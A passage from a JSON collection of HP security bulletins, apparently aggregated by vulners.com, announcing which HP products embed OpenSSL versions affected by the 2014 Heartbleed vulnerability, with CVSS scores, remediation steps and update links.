information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101543\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control server migration v7.3 and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Control server migration. This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgW8ACgkQ4B86/C0qfVkSPACg6AXj97HaBw46iPIin1VL7YnW\r\nnoQAoJbFj4yAe286o14VdL81VuF3D3xb\r\n=G4bD\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-02T00:00:00", "published": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30519", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30519", "title": "[security bulletin] HPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04250814\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04250814\r\nVersion: 1\r\n\r\nHPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-17\r\nLast Updated: 2014-04-17\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101517)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nServer Automation, 10.00, 10.01\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843314/binary/SA_Alert_\r\nHeartbleed_Vulnerability.pdf\r\n\r\nHP recommends following the Server Automation remediation guidelines and\r\ncompleting the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 17 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNP3uIACgkQ4B86/C0qfVm3kQCgrhhP0/att4M8wopB81/dAlzX\r\nBXMAoOMhgToWBG9l+JKMLuOaORt3BhE1\r\n=J4SK\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30474", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30474", "title": "[security bulletin] HPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 2\r\n\r\nHPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-29\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP Version Control\r\nAgent (VCA) and Version Control Repository Manager (VCRM).\r\n\r\nNote: OpenSSL has been updated 1.0.1g in these updates.\r\n\r\nProduct version/Platform\r\n Download Location (Web or FTP)\r\n\r\nHP Version Control Agent v7.3.2 for Windows x86\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5d66a09b2e6a490e9a61950f21\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p639883427/v97218\r\n\r\nHP Version Control Agent v7.3.2 for Windows x64\r\n\r\nhttp://www.hp.com/swpublishing/MTX-bd3ae96c013346078625d38398\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p519919823/v97223\r\n\r\nHP Version Control Agent v7.3.2 for Linux\r\n\r\nhttp://www.hp.com/swpublishing/MTX-d517a8466f6341d38519b5277b\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1174025843/v97276\r\n\r\nHP Version Control Repository Manager v7.3.2\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5ee056c2b13449e8b7153e21a1\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p283849675/v97269\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\nVersion:2 (rev.2) - 29 April 2014 Added Software update information\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNfxzMACgkQ4B86/C0qfVnxzgCfYGUWPnj9fMIXFN3Tt1d05Yhw\r\n9koAoN6wTZ3HPpXfoJnXOJwBa+A563SI\r\n=mvDg\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30496", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30496", "title": "[security bulletin] HPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260385\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260385\r\nVersion: 1\r\n\r\nHPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with WMI Mapper for HP\r\nSystems Insight Manager running OpenSSL. This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101523\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for WMI Mapper for HP\r\nSystems Insight Manager to resolve the vulnerability.\r\n\r\nWMI Mapper 7.2.3 (to be used for 7.2, 7.2.1 and 7.2.2 upgrades)\r\nWMI Mapper 7.3.2 (to be used for 7.3 and 7.3.1 upgrades)\r\n\r\nThe software updates are available here:\r\n\r\nSoftware Version\r\n Location\r\n\r\nWMI Mapper 7.2.3\r\n http://www.hp.com/swpublishing/MTX-9ef95a0fdf044f7aa5f7a09445\r\n\r\nWMI Mapper 7.3.2\r\n http://www.hp.com/swpublishing/MTX-4503970ccd6841dca639ddbcee\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW4IMACgkQ4B86/C0qfVmF8ACaAvPqjqJ+M0rI8rH+l1chmwY4\r\np/gAoIxRd6xqTFRbjlGtAFTc2jY01H1K\r\n=q4pb\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30506", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30506", "title": "[security bulletin] HPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236102\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236102\r\nVersion: 1\r\n\r\nHPSBMU02995 rev.1 - HP Software HP Service Manager, Asset Manager, UCMDB\r\nBrowser, Executive Scorecard, Server Automation, Diagnostics, LoadRunner,\r\nPerformance Center, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-11\r\nLast Updated: 2014-04-11\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101499)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Product\r\n Impacted HP Product Versions\r\n Notes\r\n\r\nHP Service Manager\r\n v9.32, v9.33\r\n\r\nHP Asset Manager\r\n v9.40, v9.40 CSC\r\n\r\nHP UCMDB Browser\r\n\r\n APR enabled on Tomcat includes an affected OpenSSL version\r\n\r\nHP CIT (ConnectIT)\r\n v9.52, v9.53\r\n\r\nHP Executive Scorecard\r\n v9.40, v9.41\r\n\r\nHP Server Automation\r\n v10.00, v10.01\r\n\r\nHP Diagnostics\r\n v9.23, v9.23 IP1\r\n\r\nHP LoadRunner\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nHP Performance Center\r\n v11.52, v12.0\r\n Controller/load generator communication channel\r\n\r\nImpacted Versions table\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP Software is working to address this vulnerability for all affected product\r\nversions. HP Software will release product specific security bulletins for\r\neach impacted product. Each bulletin will include a patch and/or mitigation\r\nguideline. HP will update this bulletin with references to security bulletins\r\nfor each product in the impacted versions table.\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online 